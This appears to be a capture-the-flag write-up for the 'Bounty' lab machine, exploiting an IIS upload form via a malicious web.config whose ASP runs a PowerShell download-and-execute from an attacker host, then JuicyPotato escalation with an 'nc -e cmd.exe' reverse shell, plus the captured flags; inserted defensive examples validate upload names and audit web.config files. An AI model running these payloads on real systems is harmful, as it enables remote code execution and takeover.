Service overview

Let's run a port scan with nmapAutomator, then enumerate directories with gobuster:

$ nmapAutomator.sh -H 10.10.10.93 -t Full

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

$ gobuster dir --url http://10.10.10.93/ -w /usr/share/dirb/wordlists/common.txt -x asp,aspx,txt,pdf

/aspnet_client        (Status: 301) [Size: 156] [--> http://10.10.10.93/aspnet_client/]
/transfer.aspx        (Status: 200) [Size: 941]                                        
/uploadedfiles        (Status: 301) [Size: 156] [--> http://10.10.10.93/uploadedfiles/]

Script

Let's write a script for the upload page at http://10.10.10.93/transfer.aspx that checks which file extensions the form accepts:

$ nano checker.py
#!/usr/bin/python3
import sys
import requests
from bs4 import BeautifulSoup

url = "http://10.10.10.93/transfer.aspx"
filename = "extension.txt"

def upload(f):
    # Fetch the form first: an ASP.NET page rejects a POST that lacks the
    # __VIEWSTATE and __EVENTVALIDATION values it rendered.
    s = requests.Session()
    r = s.get(url)
    if r.status_code != 200:
        print("[ERROR] Can't connect...")
        sys.exit(1)
    p = BeautifulSoup(r.content, "html.parser")
    viewState = p.find(attrs={'name': '__VIEWSTATE'})['value']
    eventValidation = p.find(attrs={'name': '__EVENTVALIDATION'})['value']
    postData = {
        '__VIEWSTATE': viewState,
        '__EVENTVALIDATION': eventValidation,
        'btnUpload': 'Upload'
    }
    # Submit a dummy file whose name carries the extension under test
    uploadedFile = {'FileUpload1': (f, 'test')}
    r = s.post(url, files=uploadedFile, data=postData)
    return r.text


print("[INFO] Allowed Extensions:")
with open(filename, 'r') as exts:
    for i in exts:
        ext = i.strip()
        if not ext:
            continue
        response = upload('bigb0ss.' + ext)
        # The page's success message contains "successfully" only for accepted extensions
        if "successfully" in response:
            print("[+] %s" % ext)
$ nano extension.txt
png
jpg
php
php5
php7
phtml
txt
html
asp
aspx
exe
config
js
$ python3 checker.py
[INFO] Allowed Extensions:
[+] png
[+] jpg
[+] config
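The scan above shows the real weakness: the form's allow-list includes .config, so a user-supplied web.config can reach a served directory. As an added example (not code from the writeup), here is the server-side filename check an upload handler should have applied. The allow-list, the reserved-name set and the function name are assumptions for this illustration; the logic generalizes beyond the page's case to double extensions, Windows trailing-dot names and path traversal.

```python
import os
import re
from typing import Tuple

# Allow-list of extensions the upload form is meant to accept (assumed for this
# example; the writeup shows the real form also accepted .config).
ALLOWED_EXTENSIONS = {"png", "jpg"}

# Names IIS/ASP.NET interpret when they sit in a served directory: a user-supplied
# web.config reconfigures handlers for that directory, so never accept the name.
RESERVED_BASENAMES = {"web.config", "global.asax"}

# Stem (name without extension): alphanumerics, underscore and dash only.
_SAFE_STEM = re.compile(r"^[a-z0-9][a-z0-9_-]{0,63}$")


def validate_upload_name(name: str) -> Tuple[bool, str]:
    """Return (ok, reason). Only the final extension counts, and it must be allow-listed."""
    # Windows drops trailing dots and spaces when creating a file, so
    # "shell.aspx." lands on disk as shell.aspx; normalize the same way first.
    cleaned = name.strip().rstrip(". ")
    # Anything that could escape the upload directory is rejected outright.
    if "\\" in cleaned or "/" in cleaned or cleaned != os.path.basename(cleaned):
        return False, "path separators not allowed"
    lowered = cleaned.lower()
    if lowered in RESERVED_BASENAMES:
        return False, "reserved file name"
    stem, dot, ext = lowered.rpartition(".")
    if not dot or not stem:
        return False, "missing extension"
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension .{ext} not allowed"
    # "photo.aspx.png" passes the extension test but still smuggles a second one.
    if "." in stem:
        return False, "multiple extensions not allowed"
    if not _SAFE_STEM.match(stem):
        return False, "unsafe characters in name"
    return True, ""


if __name__ == "__main__":
    # Constructed sample names, including the ones the writeup's checker would try.
    for candidate in ("photo.jpg", "bigb0ss.config", "web.config",
                      "photo.aspx.png", "shell.aspx.", "..\\..\\web.config"):
        ok, reason = validate_upload_name(candidate)
        print(f"{candidate!r:24} -> {'accepted' if ok else 'rejected: ' + reason}")
```

In practice the client-supplied name should only be validated, never used as the stored name: generate a random server-side name with the validated extension, and keep the upload directory free of script execution at the IIS level so a validation bug does not turn into code execution.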

Let's write our payload into web.config:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
   <appSettings>
   </appSettings>
</configuration>
<!-- ASP code comes here
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.6/shell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
-->
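The file above works because a web.config in a served directory can register a script handler, lift request filtering for .config, and un-hide web.config itself, while the ASP body rides along in an XML comment after the root element. As an added example (not code from the writeup), the audit below flags exactly those directives in any web.config found under an upload tree and passes a hardened one. The constructed copies of the two configs, the function names and the finding texts are assumptions for this illustration; the script body inside the comment is replaced by a placeholder.

```python
import os
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed copy of the uploaded web.config from the writeup; the ASP body in
# the trailing comment is replaced by a placeholder.
MALICIOUS_WEB_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\\system32\\inetsrv\\asp.dll"
           resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!-- <% ' server-side script body omitted %> -->
"""

# Constructed example of what a web.config in an upload directory should look
# like: no handler changes, and only the image extensions the form accepts are served.
HARDENED_WEB_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <security>
      <requestFiltering>
        <fileExtensions allowUnlisted="false">
          <add fileExtension=".png" allowed="true" />
          <add fileExtension=".jpg" allowed="true" />
        </fileExtensions>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
"""

RISKY_ACCESS = {"script", "execute", "write"}


def audit_web_config(text: str) -> List[str]:
    """Return a list of findings for one web.config; an empty list means nothing suspicious."""
    findings: List[str] = []
    # The parser discards comments, so check the raw text for ASP delimiters first.
    if "<%" in text:
        findings.append("server-side script delimiters (<%) embedded in the file")
    try:
        root = ET.fromstring(text)
    except ET.ParseError as exc:
        findings.append(f"not well-formed XML: {exc}")
        return findings
    for handlers in root.iter("handlers"):
        policy = {p.strip().lower() for p in handlers.get("accessPolicy", "").split(",")}
        if policy & RISKY_ACCESS:
            findings.append(f"handlers accessPolicy grants {sorted(policy & RISKY_ACCESS)}")
        for add in handlers.findall("add"):
            if add.get("scriptProcessor") or add.get("modules") == "IsapiModule":
                findings.append(f"script handler registered for path {add.get('path')!r}")
    for rf in root.iter("requestFiltering"):
        for ext in rf.findall("fileExtensions/remove"):
            findings.append(f"request filtering lifted for extension {ext.get('fileExtension')}")
        for seg in rf.findall("hiddenSegments/remove"):
            findings.append(f"hidden segment {seg.get('segment')!r} made requestable")
    return findings


def scan_upload_dirs(base: str) -> Dict[str, List[str]]:
    """Audit every web.config under base (IIS matches the file name case-insensitively)."""
    report: Dict[str, List[str]] = {}
    for dirpath, _dirs, files in os.walk(base):
        for fname in files:
            if fname.lower() == "web.config":
                full = os.path.join(dirpath, fname)
                with open(full, encoding="utf-8-sig") as fh:
                    report[full] = audit_web_config(fh.read())
    return report


if __name__ == "__main__":
    for label, cfg in (("malicious", MALICIOUS_WEB_CONFIG), ("hardened", HARDENED_WEB_CONFIG)):
        print(f"[{label}]")
        for finding in audit_web_config(cfg) or ["no findings"]:
            print("  -", finding)
```

Beyond auditing, the durable fix is to stop a directory-level web.config from being able to change handlers at all: in applicationHost.config, lock the upload directory's configuration with a `<location path="..." overrideMode="Deny">` element so that a user-supplied web.config cannot override the handlers and requestFiltering sections.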

Save the Nishang shell as shell.ps1, upload web.config, and request it:

python3 -m http.server 80
rlwrap nc -lnvp 1234
curl http://10.10.10.93/uploadedfiles/web.config

User flag

PS C:\users\merlin\desktop> ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.10.93
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{27C3F487-28AC-4CE6-AE3A-1F23518EF7A7}:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
PS C:\users\merlin\desktop> type user.txt
e29ad89891462e0b09741e3082f44a2f

Privilege escalation

We simply use JuicyPotato: https://github.com/ivanitlearning/Juicy-Potato-x86/releases/download/1.2/Juicy.Potato.x86.exe

On the local machine:

python3 -m http.server 
rlwrap nc -lnvp 1235
rlwrap nc -lnvp 1236

On the remote machine:

> certutil -urlcache -f "http://10.10.14.8/JuicyPotatoX86.exe" jp.exe
> certutil -urlcache -f "http://10.10.14.8/nc.exe" nc.exe
> nc.exe 10.10.14.6 1235
> jp.exe -l 1234 -p nc.exe -a "10.10.14.6 1236 -e cmd.exe" -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820}  

(a non-default CLSID for Windows 2008 has to be taken from here: https://ohpe.it/juicy-potato/CLSID/)

Root flag

C:\Users\Administrator\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.10.93
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{27C3F487-28AC-4CE6-AE3A-1F23518EF7A7}:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
C:\Users\Administrator\Desktop>type root.txt                                                       
c837f7b699feef5475a0c079f9d4f5ea